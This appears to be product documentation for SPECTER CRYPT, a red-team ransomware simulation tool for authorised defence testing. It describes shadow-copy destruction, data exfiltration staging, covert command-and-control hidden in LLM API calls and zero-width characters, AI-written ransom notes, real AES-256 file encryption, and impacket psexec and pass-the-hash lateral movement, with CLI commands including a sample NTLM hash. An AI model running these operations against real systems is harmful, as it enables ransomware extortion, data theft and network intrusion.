Red Specter SPECTER CRYPT

AI-Assisted Ransomware Simulation Engine — 8 subsystems covering the complete ransomware kill chain with AES-256-CBC encryption, LLM-API covert C2, and impacket lateral movement.

v1.0.0 — 297 tests passing
Contents
Overview The 8 Subsystems Subsystem Details Full Pipeline Mode Covert C2 Engine Encryption Engine Propagation — impacket Report Output Requirements Standards Coverage UNLEASHED Disclaimer

Overview

Red Specter SPECTER CRYPT is an AI-assisted ransomware simulation engine. It operationalises the complete ransomware kill chain in a controlled, authorised environment — from initial target reconnaissance through shadow copy destruction, data exfiltration, covert LLM-API command-and-control, AI-generated ransom note production, AES-256-CBC file encryption with key escrow, and impacket-driven lateral movement.

SPECTER CRYPT is NIGHTFALL Tool 82. It provides 8 subsystems under a single CLI (specter-crypt), two covert C2 channels (base64_json prompt embedding and whitespace steganography), and Ed25519-signed CryptReports with full MITRE ATT&CK and ATLAS TTP mapping. Real AES-256-CBC encryption with key escrow ensures no files are permanently lost during authorised red-team exercises.

Security teams use SPECTER CRYPT to validate ransomware detection rules, test incident response playbooks, generate realistic artefacts for IR exercises, and verify that network segmentation prevents lateral movement. Every simulation produces a signed evidence chain suitable for post-engagement reporting.

The 8 Subsystems

#SubsystemCommandGateWhat It Does
01RECONspecter-crypt reconOPENTarget enumeration — files, high-value targets, shares, network hosts, recon manifest
02SHADOWspecter-crypt shadowINJECTShadow copy and backup destruction simulation — VSS/wmic commands, service stop sequence
03EXFILspecter-crypt exfilINJECTPre-encryption data staging — double-extortion archive creation and channel simulation
04C2specter-crypt c2INJECTLLM-API covert C2 — base64_json prompt embedding and whitespace steganography channels
05RANSOMspecter-crypt ransomINJECTAI-generated ransom notes — corporate/personal/government templates, negotiation portal
06ENCRYPTspecter-crypt encryptDESTROYAES-256-CBC file encryption — per-file IV, .crypt extension, key escrow, selective targeting
07PROPAGATEspecter-crypt propagateDESTROYLateral movement — impacket psexec and pass-the-hash against authorised target hosts
08REPORTspecter-crypt reportOPENEd25519-signed CryptReport — SHA-256 evidence chain, ATT&CK + ATLAS TTP mapping

Subsystem Details

01 RECON specter-crypt recon

Enumerates the target environment and produces a manifest for downstream subsystems.

02 SHADOW specter-crypt shadow

Simulates shadow copy and backup destruction — the pre-encryption step used by all major ransomware families.

03 EXFIL specter-crypt exfil

Stages high-value files for double-extortion simulation before the ENCRYPT phase.

04 C2 specter-crypt c2

Establishes a covert command-and-control channel using LLM API calls as the transport layer.

05 RANSOM specter-crypt ransom

Generates AI-authored ransom notes contextually tailored to the target organisation.

06 ENCRYPT specter-crypt encrypt / specter-crypt decrypt

Real AES-256-CBC file encryption with key escrow for authorised recovery.

07 PROPAGATE specter-crypt propagate

Lateral movement simulation via impacket — psexec and pass-the-hash methods.

08 REPORT specter-crypt report

Aggregates all subsystem outputs into a signed CryptReport with full TTP mapping.

Full Pipeline Mode

One command runs all 8 subsystems in sequence — recon through report — producing a signed CryptReport.

$ specter-crypt run --target ./testenv/ --c2-provider openai --c2-mode base64_json --override --confirm-destroy

CLI Options

$ specter-crypt run --help --target, -t Target directory or path for recon/encrypt/propagate [required] --c2-provider C2 LLM provider: openai, anthropic, gemini, generic [default: openai] --c2-mode C2 channel mode: base64_json, whitespace_stego [default: base64_json] --api-key, -k LLM API key [optional — reads env OPENAI_API_KEY etc.] --ransom-template Ransom note template: corporate, personal, government [default: corporate] --encrypt-ext File extensions to encrypt [default: docx,xlsx,pdf,sql,env,pem] --scope-file Authorised host scope file for PROPAGATE [required for propagate] --propagate-method Lateral movement method: psexec, pass_the_hash [default: psexec] --output-dir Output directory for artefacts [default: crypt_output] --dry-run Generate artefacts without executing destructive operations --override Activate INJECT tier (shadow/exfil/c2/ransom) --confirm-destroy Activate DESTROY tier (encrypt/propagate) [requires --override]

Individual Subsystem Commands

$ specter-crypt recon --target ./testenv/ $ specter-crypt shadow --override --dry-run $ specter-crypt exfil --override --manifest recon_manifest.json $ specter-crypt c2 --override --provider openai --mode base64_json $ specter-crypt c2 --override --provider openai --mode whitespace_stego $ specter-crypt ransom --override --template corporate $ specter-crypt encrypt --override --confirm-destroy --target ./testenv/ $ specter-crypt decrypt --escrow escrow.key.enc --target ./testenv/ $ specter-crypt propagate --override --confirm-destroy --method psexec --scope-file scope.txt $ specter-crypt propagate --override --confirm-destroy --method pass_the_hash --scope-file scope.txt $ specter-crypt report

Covert C2 Engine

base64_json Channel

Operator instructions are serialised as a JSON object and base64-encoded. The encoded payload is embedded in the user turn of an LLM API call as a comment or annotation. The model response carries the encoded acknowledgement back. The client base64-decodes the response to extract the C2 command confirmation.

$ specter-crypt c2 --override --provider openai --mode base64_json --turns 5 --pcap

whitespace_stego Channel

A binary beacon signal is encoded as a sequence of Unicode zero-width characters (U+200B = 0, U+200C = 1). The encoded signal is injected into normal cover text at word boundaries. The receiver strips visible characters and decodes the zero-width sequence back to the original beacon. Signal ratio measures the proportion of bits successfully recovered.

$ specter-crypt c2 --override --provider anthropic --mode whitespace_stego --cover-tokens 256

Encryption Engine

SPECTER CRYPT uses AES-256-CBC — the same cipher family used by major ransomware campaigns. All encryption is reversible via the key escrow mechanism.

Encryption Process

Key Escrow

$ specter-crypt encrypt --override --confirm-destroy --target ./testenv/docs/ --ext docx,xlsx,pdf $ specter-crypt decrypt --escrow crypt_output/escrow.key.enc --target ./testenv/docs/

Propagation — impacket

psexec Method

Uses impacket's psexec implementation to deploy a service-based remote execution payload to authorised target hosts over SMB. Requires SMB access and valid credentials in the scope file.

$ specter-crypt propagate --override --confirm-destroy --method psexec --scope-file scope.txt --credentials creds.json

pass_the_hash Method

Uses NTLM hash-based authentication — no plaintext password required. Hash is supplied in the credentials file in LM:NT format. Demonstrates that password resets alone are insufficient if hashes remain valid.

$ specter-crypt propagate --override --confirm-destroy --method pass_the_hash --scope-file scope.txt --hash aad3b435b51404eeaad3b435b51404ee:8846f7eaee8fb117ad06bdd830b7586c

Scope File Format

# scope.txt — one authorised host per line 10.0.0.15 10.0.0.23 192.168.1.100

Report Output

SPECTER CRYPT generates a signed CryptReport (SCR) aggregating all subsystem findings.

Report Schema

{ "report_id": "SCR-a3f29b1c4e7d", "timestamp": "2026-05-13T14:22:11Z", "target": "./testenv/", "subsystems_run": ["recon","shadow","exfil","c2","ransom","encrypt","propagate"], "findings": [...], "severity": "CRITICAL", "mitre_attack_ttps": ["T1486","T1490","T1041","T1570","T1550.002","T1566"], "mitre_atlas_ttps": ["AML.T0051","AML.T0043","AML.T0056","AML.T0048","AML.T0040"], "owasp_llm": ["LLM01","LLM02","LLM06","LLM08","LLM09"], "evidence_chain_hash": "sha256:...", "ed25519_signature": "...", "artefacts": ["recon_manifest.json","exfil_stage.tar.gz.enc","c2_pcap.pcap","ransom.txt","escrow.key.enc"] }

Requirements

Core (always required) Python 3.10+, cryptography, impacket, httpx, pynacl, pypcapfile
C2 Channels openai, anthropic, google-generativeai (provider-dependent)
INJECT Tier Valid UNLEASHED Ed25519 key in SPECTER_PRIVATE_KEY env var
DESTROY Tier --override --confirm-destroy flags + UNLEASHED key (dual-sign)
$ pip install red-specter-specter-crypt # With all C2 provider dependencies: $ pip install "red-specter-specter-crypt[all]"

Standards Coverage

MITRE ATT&CK TTPs

MITRE ATLAS TTPs

OWASP LLM Top 10

UNLEASHED

SPECTER CRYPT uses the standard NIGHTFALL three-tier UNLEASHED gate enforced by Ed25519 signature verification.

# Set UNLEASHED key for INJECT/DESTROY operations: $ export SPECTER_PRIVATE_KEY=$(cat /path/to/unleashed.key) # INJECT tier — shadow copy destruction simulation: $ specter-crypt shadow --override # DESTROY tier — real AES-256-CBC encryption: $ specter-crypt encrypt --override --confirm-destroy --target ./testenv/

Disclaimer

AUTHORISED USE ONLY. SPECTER CRYPT is designed exclusively for authorised red-team exercises, penetration testing engagements, and ransomware defence validation in isolated test environments. The ENCRYPT subsystem performs real AES-256-CBC file encryption — always run against dedicated test environments with verified backups and full system snapshots. Use against production systems, unauthorised hosts, or without explicit written permission from the system owner is illegal and strictly prohibited. Unauthorised use may violate Computer Misuse Act 1990 (UK), Computer Fraud and Abuse Act (US), and equivalent legislation globally. SPECTER CRYPT is restricted to licensed operators with verified UNLEASHED credentials. Apache License 2.0 — use subject to Red Specter authorised operator agreement.